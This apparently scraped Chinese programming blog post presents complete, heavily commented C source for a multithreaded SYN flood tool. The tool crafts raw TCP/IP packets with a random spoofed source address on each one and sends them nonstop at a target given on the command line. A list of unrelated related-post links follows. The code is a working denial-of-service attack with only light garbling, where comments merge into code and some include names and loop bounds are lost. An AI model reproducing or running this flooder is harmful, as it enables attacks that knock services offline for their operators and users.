syn c 语言程序,C语言实现SYN Flood
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* 最多线程数 */
#define MAXCHILD 128
/* 原始套接字 */
int sockfd;
/* 程序活动标志 */
//while这个值来判断要不要继续发包
//截获SIGINT信号就将该值改为0, 从而结束发包
//因为是多线程发包, 所以要这么来结束static int alive = -1;
char dst_ip[20] = { 0 };
int dst_port;
//ip层的内容, 目的ip/源ip/ttl等struct ip{
unsigned char hl;
unsigned char tos;
unsigned short total_len;
unsigned short id;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
};
//tcp层的内容, 源端口/目的端口/seq等
//最后发送的数据就是ip层拼接上tcp层struct tcphdr{
unsigned short sport;
unsigned short dport;
unsigned int seq;
unsigned int ack;
unsigned char lenres;
unsigned char flag;
unsigned short win;
unsigned short sum;
unsigned short urp;
};
//tcp的伪头部, 这部分是网络本来就有的, 是用来检查该包是不是发给自己的
//后面会转换为checksum放到tcp层的checksum里, 不作为实际传输内容
//收方反checksum发现daddr是自己就准入了(具体操作不是反checksum, 不详述了, 意思懂就好)struct pseudohdr
{
unsigned int saddr;
unsigned int daddr;
char zero;
char protocol;
unsigned short length;
};
/* CRC16校验 */
/* unsigned short inline */
//没什么好说的, 就是规定的checksum算法, 因为用了raw socket, 所以要自行checksum
//这里本来是个inline, 应该是为了加快计算速度, 但是不知道为啥一直爆undefined reference, 查了一会试了几次搞不定就删了, 删后可以跑unsigned short checksum (unsigned short *buffer, unsigned short size)
{
unsigned long cksum = 0;
while(size>1){
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if(size){
cksum += *(unsigned char *)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return((unsigned short )(~cksum));
}
/* 发送SYN包函数
* 填写IP头部,TCP头部
* TCP伪头部仅用于校验和的计算
*/
//初始化ip层/tcp层内容
//简单讲就是在ip层填源目的ip, 在tcp层填入源目的端口, 然后是其他详细选项void init_header(struct ip *ip, struct tcphdr *tcp, struct pseudohdr *pseudoheader)
{
int len = sizeof(struct ip) + sizeof(struct tcphdr);
// IP头部数据初始化 //header length ip->hl = (4<<4 | sizeof(struct ip)/sizeof(unsigned int));
//type of service ip->tos = 0;
ip->total_len = htons(len);
ip->id = 1;
ip->frag_and_flags = 0x40;
//time to live ip->ttl = 255;
ip->proto = IPPROTO_TCP;
ip->checksum = 0;
ip->sourceIP = 0;
ip->destIP = inet_addr(dst_ip);
// TCP头部数据初始化 tcp->sport = htons( rand()%16383 + 49152 );
tcp->dport = htons(dst_port);
tcp->seq = htonl( rand()%90000000 + 2345 );
tcp->ack = 0;
tcp->lenres = (sizeof(struct tcphdr)/4<<4|0);
//tcp的flag共6个, 右边数第二个是syn, 所以也就是000010, 也就是0x02 //SYN Flood的SYN就在这里了, 每次发的包都是syn包, 因为是raw socket, 所以回复不自动处理 tcp->flag = 0x02;
tcp->win = htons (2048);
//后面填充 tcp->sum = 0;
tcp->urp = 0;
//TCP伪头部 //构造伪头部, 源目的ip填好, 后面会计算checksum填入tcp层的checksum值, 不直接传输 pseudoheader->zero = 0;
pseudoheader->protocol = IPPROTO_TCP;
pseudoheader->length = htons(sizeof(struct tcphdr));
pseudoheader->daddr = inet_addr(dst_ip);
srand((unsigned) time(NULL));
}
/* 发送SYN包函数
* 填写IP头部,TCP头部
* TCP伪头部仅用于校验和的计算
*/
//主要函数, 构造包发送void send_synflood(struct sockaddr_in *addr)
{
char buf[100], sendbuf[100];
int len;
struct ip ip; //IP头部 struct tcphdr tcp; //TCP头部 struct pseudohdr pseudoheader; //TCP伪头部
len = sizeof(struct ip) + sizeof(struct tcphdr);
/* 初始化头部信息 */
init_header(&ip, &tcp, &pseudoheader);
/* 处于活动状态时持续发送SYN包 */
//SIGINT信号会将active改为0, 从而退出 while(alive)
{
//伪造源ip ip.sourceIP = rand();
//计算IP校验和 bzero(buf, sizeof(buf));
memcpy(buf , &ip, sizeof(struct ip));
ip.checksum = checksum((u_short *) buf, sizeof(struct ip));
pseudoheader.saddr = ip.sourceIP;
//计算TCP校验和 //这里的校验和用到了伪头部, 伪头部只在这里用到, 伪头部只在这里参与计算checksum, 而不是作为实际传输内容参与传输 bzero(buf, sizeof(buf));
memcpy(buf , &pseudoheader, sizeof(pseudoheader));
memcpy(buf+sizeof(pseudoheader), &tcp, sizeof(struct tcphdr));
tcp.sum = checksum((u_short *) buf, sizeof(pseudoheader)+sizeof(struct tcphdr));
//sendbuf就是最后的传输内容 bzero(sendbuf, sizeof(sendbuf));
//可以看到最后的传输内容是ip层内容直接拼接上tcp层内容 memcpy(sendbuf, &ip, sizeof(struct ip));
memcpy(sendbuf+sizeof(struct ip), &tcp, sizeof(struct tcphdr));
//传一个包打印一个. printf(".");
//sockfd是socket描述符 //sendbuf放要发送的数据, len是长度 //0是个flag //addr放目的地 //最后一个常被赋值为sizeof(struct sockaddr) if ( sendto(sockfd, sendbuf, len, 0, (struct sockaddr *) addr, sizeof(struct sockaddr)) < 0 )
{
perror("sendto()");
pthread_exit("fail");
}
//sleep(1); }
}
/* 信号处理函数,设置退出变量alive */
//因为多线程SIGINT无法传到每个线程, 所以用这种方式关闭每个线程void sig_int(int signo)
{
alive = 0;
}
/* 主函数 */
int main(int argc, char *argv[])
{
struct sockaddr_in addr;
struct hostent * host = NULL;
int on = 1;
int i = 0;
pthread_t pthread[MAXCHILD];
int err = -1;
alive = 1;
/* 截取信号CTRL+C */
signal(SIGINT, sig_int);
/* 参数是否数量正确 */
if(argc < 3)
{
printf("usage: syn n");
exit(1);
}
strncpy( dst_ip, argv[1], 16 );
// ascii to int dst_port = atoi( argv[2] );
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(dst_port);
//inet_addr将点分十进制ip转为长整型 //inet_addr函数失败时返回INADDR_NONE //这行就是检测ip合法不合法 if(inet_addr(dst_ip) == INADDR_NONE)
{
/* 为DNS地址,查询并转换成IP地址 */
//第一个参数要是一个域名或ip //返回hostent结构 host = gethostbyname(argv[1]);
//也就是既不是ip也不是合法域名 if(host == NULL)
{
perror("gethostbyname()");
exit(1);
}
//addr结构体前面传入了AF_INET和端口, 这里传入ip //addr.sin_addr是struct in_addr格式, 要自己强转 //addr.sin_addr.s_addr是struct in_addr_t格式, inet_addr("1.1.1.1")就是返回这个格式 addr.sin_addr = *((struct in_addr*)(host->h_addr));
//inet_ntoa将十进制网络字节序转换为点分十进制IP格式的字符串 strncpy( dst_ip, inet_ntoa(addr.sin_addr), 16 );
}
else
addr.sin_addr.s_addr = inet_addr(dst_ip);
if( dst_port < 0 || dst_port > 65535 )
{
printf("Port Errorn");
exit(1);
}
printf("host ip=%sn", inet_ntoa(addr.sin_addr));
/* 建立原始socket */
sockfd = socket (AF_INET, SOCK_RAW, IPPROTO_TCP);
if (sockfd < 0)
{
perror("socket()");
exit(1);
}
/* 设置IP选项 */
//设置sockfd这个socket, 协议层次是ip层, 设置这层的IP_HDRINCL选项, 置其值为on的值, 也就是1 //设置这个选项作用是: 为0则ip头由内核自动填, 为1则表示数据包包含ip头, 即用户自定义ip头 if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof (on)) < 0)
{
perror("setsockopt()");
exit(1);
}
/* 将程序的权限修改为普通用户 */
setuid(getpid());
/* 建立多个线程协同工作 */
for(i=0; i
{
err = pthread_create(&pthread[i], NULL, send_synflood, &addr);
if(err != 0)
{
perror("pthread_create()");
exit(1);
}
}
/* 等待线程结束 */
for(i=0; i
{
err = pthread_join(pthread[i], NULL);
if(err != 0)
{
perror("pthread_join Errorn");
exit(1);
}
}
close(sockfd);
return 0;
}
syn c 语言程序,C语言实现SYN Flood相关推荐
- 棱形旋转c语言程序_C 语言时隔 5 年重回巅峰,这 20 个热门项目拿去练手!
在上个月的 TIOBE 编程语言排名中,C 语言和 Java 的差距只有 0.01%.在近日 TIOBE 公布的 2020 年 5 月编程语言排行榜中,C 语言成功超越了 Java,重返第一的王者宝座 ...
- 蜂鸣器发出7种音阶c语言程序_C语言编程新思路
第一章 单元测试 1.单选题: 关于一个C语言程序执行的起点和终点,以下选项正确的是 ( ). 选项: A: main 任意 B: main 最后一个 C: main main D: 第一个 最后一个 ...
- 文件的记录c语言程序,c语言程序学生籍贯信息记录簿设计.docx
c 语言程序学生籍贯信息记录簿设计 学生籍贯信息记录簿 课程设计报告书 班 级: 方 0909-1 学 号:姓 名: 苑 小 叶 指导教师 : 康 亚 男 石家庄铁道大学四方学院 2010年 07月 ...
- 学生实验平台搭建c语言程序,c语言程序设计实验学生用.doc
c语言程序设计实验学生用 C语言程序设计 实验指导 (学生用) 计算机基础教研室 <C语言程序设计>课程组 2012年9月 前 言 <C语言程序设计>是计算机科学技术系面向全校 ...
- 插入法排序c语言程序,C语言之插入排序算法
一.什么是直接插入算法? 直接插入排序是一种简单的插入排序法,其基本思想是:把待排序的纪录按其关键码值的大小逐个插入到一个已经排好序的有序序列中,直到所有的纪录插入完为止,得到一个新的有序序列. 选择 ...
- 青花瓷音乐的单片机c语言程序,c语言曲谱_单片机c语言音乐简谱代码
51单片机曲谱编写音乐程序,我看不懂曲谱,谁能教下我! //<世上只有妈妈好>51单片机C语言程序和音乐采灯程序 //此程序在硬件上调试通过 //本程序的单片机晶振采用11.0592MHZ ...
- 框图c语言程序,C语言程序设计框图
<C语言程序设计框图>由会员分享,可在线阅读,更多相关<C语言程序设计框图(86页珍藏版)>请在人人文库网上搜索. 1.第三章控制结构,返回总目录,目录,3.1节目结构框,3. ...
- 简单谱子C语言程序,c语言曲谱_单片机c语言音乐简谱代码
51单片机曲谱编写音乐程序,我看不懂曲谱,谁能教下我! //<世上只有妈妈好>51单片机C语言程序和音乐采灯程序 //此程序在硬件上调试通过 //本程序的单片机晶振采用11.0592MHZ ...
- 用直接分解法求方程组的C语言程序,c语言编程求解线性方程组论文
计算机编程求解线性方程组 第一章 绪 论 在自然科学.工程技术.经济和医学各领域中产生的许多实际问题都可以通过数学语言描述为数学问题,也就是说,由实际问题建立数学模型,然后应用各种数学方法和技巧来求解 ...
- 记得每天锻炼身体c语言程序,c语言程序
一实验名称计算出1000以内10个最大素数之和二.实验目的1.熟练掌握if.if-else.if-else if语句和witch语句格式及使用方法,掌握if语句中的嵌套关系和匹配原则,利用if语句和s ...
最新文章
- [Android工具]安卓百度云盘百度网盘资源搜索工具,安卓网盘搜索软件
- java excel上传--poi
- 健身小管家--android app源码
- 两个sql交集_神奇的 SQL 之性能优化 → 让 SQL 飞起来
- 数据挖掘 pandas基础入门之操作
- python中response.text_Sanic response text() 函数用法和示例
- AGG第四十四课 渲染问题:绘制较宽轮廓和尖锐边缘
- 掌握jsp自定义标签:(四)
- WindowsXP操作系统进程详细介绍
- 设计一个线程安全的单例(Singleton)模式
- 按方位提取高程数据的方法
- sudo chmod 755 ....指令分析
- 移动安全:Smali语法学习示例与实践
- 查询计算机物理地址指令,怎么查询mac地址命令_如何查mac地址
- VM打开虚拟机VMX进程已提前退出错误及解决办法
- 如何在Excel中使用公式将生日自动转换成星座?
- 全文索引elasticsearch
- windows应用(vc++2022)MFC基础到实战(1)-基础(1)
- 【花雕体验】11 上手ESP32C3
- 涨停板第二天开盘的三种操作方法